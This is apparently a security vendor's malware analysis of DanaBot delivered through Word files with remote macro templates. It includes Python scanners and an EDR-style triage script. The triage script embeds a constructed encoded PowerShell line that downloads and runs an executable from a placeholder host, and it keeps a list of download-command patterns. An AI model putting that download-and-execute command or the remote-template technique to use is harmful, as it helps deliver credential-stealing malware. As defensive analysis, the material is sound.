Distribution of DanaBot Malware Detected by AhnLab EDR via Word Files

Two types of malicious documents have recently been distributed via email: those that exploit the Equation Editor and those that contain external link URLs. This post describes the infection flow of the DanaBot malware distributed through the latter type, documents containing external links, together with the evidence and the detection process as shown in the AhnLab EDR diagram. Figure 1 shows the content of a spam email with an attached Word document (.docx) that contains an external link. The email is carefully disguised as a job application form to deceive the recipient into opening the attachment.

Figure 1. The email with a malicious document attached

Figure 2 depicts the EDR evidence from the PC that opened the email and executed the attachment. It shows that the document file (.docx) was created and executed through the Outlook (outlook.exe) process. The diagram shows a suspicious process tree that starts from Outlook (outlook.exe) and continues through Word (winword.exe), the command prompt (cmd.exe), PowerShell (powershell.exe), the downloaded executable (iu4t4.exe), and finally rundll32.exe.

Figure 2. A malicious Word document (.docx) generated from outlook.exe

Figure 3 shows the external link inside the attached Word file (.docx). Because of this link, opening the Word file connects to the specified address, downloads an additional document and loads it; the attachment itself contains no macro, so scanning the attachment alone finds nothing. Figure 4 shows the macro-enabled template (w1p3nx.dotm) that is downloaded and loaded through this external connection when the Word file (.docx) is opened. As shown in Figure 5, the EDR diagram confirms that the additional document (w1p3nx.dotm) is downloaded and loaded by the WINWORD.EXE process that runs the Word file.

Figure 3. The external link in the attached malicious Word document (downloads w1p3nx.dotm from an external address)
Figure 4. The macro document (w1p3nx.dotm) loaded through the Word file (.docx)
Figure 5. EDR diagram (evidence of w1p3nx.dotm being created and executed)
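The external link in Figure 3 is, in OOXML terms, a relationship whose TargetMode is External; a remote macro template is normally declared as an attachedTemplate relationship in the document's word/_rels/settings.xml.rels part, which Word follows and loads when the file is opened. The scanner below is an added example written for this post, not AhnLab's detection logic and not the sample itself. It assumes that standard attached-template mechanism, builds a constructed .docx in memory so it runs offline (the host example.invalid is a placeholder, not the real download address), and deliberately ignores file:/// targets because legitimate documents routinely attach a local template such as Normal.dotm that way.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Standard OOXML namespaces and relationship types: an Office document is a zip
# package, and every link between parts (or to the outside) lives in a *.rels part.
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = (
    "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
)
SETTINGS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings"
# Targets that make Word fetch the template off-host: http(s) URLs and UNC paths.
# file:/// targets are skipped on purpose: local attached templates are normal.
REMOTE_TARGET = re.compile(r"^(https?://|\\\\)", re.I)


def external_relationships(docx_bytes):
    """Return (rels_part, relationship_type, target) for every TargetMode="External"
    relationship in the package; only these can point outside the file."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal").lower() == "external":
                    found.append((name, rel.get("Type", ""), rel.get("Target", "")))
    return found


def is_remote_template_injection(docx_bytes):
    """True when the settings part attaches a template from a remote location: Word
    downloads and loads it (macros included, subject to macro settings) on open."""
    return any(
        rel_type == ATTACHED_TEMPLATE and REMOTE_TARGET.match(target)
        for _part, rel_type, target in external_relationships(docx_bytes)
    )


def build_sample_docx(template_url=None):
    """Construct a minimal .docx in memory for the demo. With template_url set, the
    settings part carries an external attachedTemplate relationship to it, which is
    the structure a remote-template (.dotm) downloader document uses."""
    rels_head = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
                 f'<Relationships xmlns="{REL_NS}">')
    settings_rels = rels_head
    if template_url:
        settings_rels += (f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
                          f'Target="{template_url}" TargetMode="External"/>')
    settings_rels += "</Relationships>"
    document_rels = (rels_head
                     + f'<Relationship Id="rId1" Type="{SETTINGS}" Target="settings.xml"/>'
                     + "</Relationships>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        # Content-bearing parts are stubs: only the .rels parts matter to the scanner.
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/settings.xml", "<settings/>")
        zf.writestr("word/_rels/document.xml.rels", document_rels)
        zf.writestr("word/_rels/settings.xml.rels", settings_rels)
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed sample: example.invalid is a placeholder, not the real address.
    suspicious = build_sample_docx("http://example.invalid/w1p3nx.dotm")
    for part, rel_type, target in external_relationships(suspicious):
        print(f"{part}: {rel_type.rsplit('/', 1)[-1]} -> {target}")
    print("remote template injection:", is_remote_template_injection(suspicious))
```

To check a real attachment, replace the constructed sample with `open("attachment.docx", "rb").read()`; any attachedTemplate whose target is an http(s) URL or UNC path is worth quarantining before a user opens it, because the macro content is only visible after the template has been fetched.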

Figure 6 shows the macro code in the downloaded template (w1p3nx.dotm). The macro decodes encoded CMD commands and executes them. The EDR diagram in Figure 7 confirms the decoded commands and reveals a PowerShell command that downloads the DanaBot malware (iu4t4.exe) from the C2 server.

Figure 6. The macro code of w1p3nx.dotm (executes encoded CMD commands)
Figure 7. EDR diagram (confirms the existence of the decoded CMD command that downloads an EXE file)

Figure 8 shows the DanaBot malware (iu4t4.exe) created in the download path (C:\Users\Public), and Figure 9 shows the evidence in the EDR diagram confirming that the file was created by PowerShell.

Figure 8. The downloaded EXE file (DanaBot malware)
Figure 9. EDR diagram (evidence of the DanaBot malware EXE file’s creation)

Figure 10 shows that the executed DanaBot malware (iu4t4.exe) launches rundll32.exe with shell32.dll as its argument and injects itself into that process. The malicious code therefore keeps running inside rundll32.exe, which appears to be hosting a legitimate system DLL, and all subsequent behavior is attributed to rundll32.exe rather than to iu4t4.exe.

Figure 10. EDR diagram (self-injection and re-launch through rundll32.exe)
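The chain evidenced in Figures 7, 9 and 10 (an Office process leading to cmd.exe and PowerShell, an encoded PowerShell command that downloads an executable into C:\Users\Public, and that executable re-launching through rundll32.exe with shell32.dll) can be checked mechanically against process-creation telemetry. The script below is an added example, not the AhnLab EDR's own logic and not code from this post: the event records, user and host names, the document name, the encoded payload and the rundll32 export argument are all constructed to mirror the chain described here, since the post does not give the real command lines. It generalises slightly beyond the case in the text by decoding any `-EncodedCommand` prefix form and by flagging a rundll32.exe/shell32.dll pair for any parent outside the Windows and Program Files directories.

```python
import base64
import re

# ---- constructed telemetry mirroring the chain in Figures 2, 7, 9 and 10 ----------
PAYLOAD = (r"(New-Object Net.WebClient).DownloadFile('http://example.invalid/iu4t4.exe',"
           r"'C:\Users\Public\iu4t4.exe'); Start-Process 'C:\Users\Public\iu4t4.exe'")
# powershell -EncodedCommand takes base64 of the UTF-16LE script text.
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()

EVENTS = [  # placeholder paths/names; Control_RunDLL is a stand-in for the real export
    {"pid": 100, "ppid": 1, "image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "cmdline": "OUTLOOK.EXE"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'WINWORD.EXE /n "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\X1Y2Z3\resume.docx"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": f"cmd.exe /c powershell -nop -w hidden -enc {ENCODED}"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell -nop -w hidden -enc {ENCODED}"},
    {"pid": 500, "ppid": 400, "image": r"C:\Users\Public\iu4t4.exe", "cmdline": r"C:\Users\Public\iu4t4.exe"},
    {"pid": 600, "ppid": 500, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
TRUSTED_PARENT_PREFIXES = ("c:\\windows\\", "c:\\program files")
# PowerShell accepts any unambiguous prefix of -EncodedCommand: -e, -ec, -enc, ...
ENC_FLAG = re.compile(r"(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{8,})", re.I)
DOWNLOAD_PRIMITIVES = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|net\.webclient|"
    r"start-bitstransfer|invoke-restmethod|\bcurl\b|\bwget\b", re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(events, pid):
    """The process record followed by its parents, nearest first, up to the root."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid]["ppid"]
    return chain


def decode_encoded_command(cmdline):
    """Recover the script behind powershell -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(events):
    """Apply four behavioural checks; each finding is (rule, pid, detail)."""
    findings = []
    for e in events:
        name = basename(e["image"])
        chain = ancestry(events, e["pid"])
        parents = [basename(p["image"]) for p in chain[1:]]
        # 1. An Office application anywhere up the tree leading to a shell/script host.
        if name in SHELLS and any(p in OFFICE_APPS for p in parents):
            findings.append(("office-spawned-shell", e["pid"],
                             " <- ".join(basename(p["image"]) for p in chain)))
        # 2. Encoded PowerShell whose decoded script contains a download primitive.
        if name in ("powershell.exe", "pwsh.exe"):
            script = decode_encoded_command(e["cmdline"])
            if script and DOWNLOAD_PRIMITIVES.search(script):
                findings.append(("encoded-downloader", e["pid"], script))
        # 3. An executable running from the world-writable C:\Users\Public.
        if name.endswith(".exe") and e["image"].lower().startswith("c:\\users\\public\\"):
            findings.append(("exe-in-public", e["pid"], e["image"]))
        # 4. rundll32 loading shell32.dll for a parent outside Windows/Program Files:
        #    the self-injection re-launch pattern described for DanaBot.
        if (name == "rundll32.exe" and "shell32.dll" in e["cmdline"].lower()
                and len(chain) > 1
                and not chain[1]["image"].lower().startswith(TRUSTED_PARENT_PREFIXES)):
            findings.append(("rundll32-shell32-untrusted-parent", e["pid"], chain[1]["image"]))
    return findings


if __name__ == "__main__":
    for rule, pid, detail in triage(EVENTS):
        print(f"[{rule}] pid={pid} {detail}")
```

Rule 1 is deliberately ancestry-based rather than parent-only, because the PowerShell process here has cmd.exe as its direct parent and a parent-only rule would miss the Word origin; rule 4 keys on the parent image path rather than on the rundll32 arguments, since the shell32.dll argument alone is common in legitimate use.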

DanaBot [1] can steal various data from the infected PC and can collect information even without a connection to the C2 server. The behavior evidence of rundll32.exe in the EDR diagram (Figure 11) shows the malware taking screenshots and collecting PC information and browser account credentials.

Figure 11. EDR diagram (taking screenshots and exfiltrating PC information and browser account credentials)

This article described the infection flow of DanaBot spread via documents containing external links, and the behavioral evidence that the EDR product tracked in its diagram. The attacker used a document containing an external link so that the malicious macro is not present in the attachment itself and is therefore not caught by scanning the attachment. The email was also carefully disguised as an ordinary job application form to persuade the recipient to open the document. Users should be cautious when opening attachments and check that the file's real extension is not one that can execute code. Continuous monitoring with security products is also crucial for detecting and controlling unauthorized access by threat actors.

[Behavior Detection]
Execution/MDP.Scripting.M10747
Execution/EDR.Malware.M10459

[File Detection]
Downloader/XML.External
Downloader/DOC.Generic.S2503
Trojan/Win.DANABOT.C5608053

[IOCs]
0bb0ae135c2f4ec39e93dcf66027604d (.DOCX)
28fd189dc70f5bab649e8a267407ae85 (.DOTM)
e29e4a6c31bd79d90ab2b89f57075312 (Danabot EXE)

AhnLab EDR protects the endpoint environment by delivering behavioral detection, advanced analysis, holistic visibility, and proactive threat hunting. For more information about the product, please visit our official website.

The post Distribution of DanaBot Malware via Word Files Detected by AhnLab EDR appeared first on ASEC BLOG.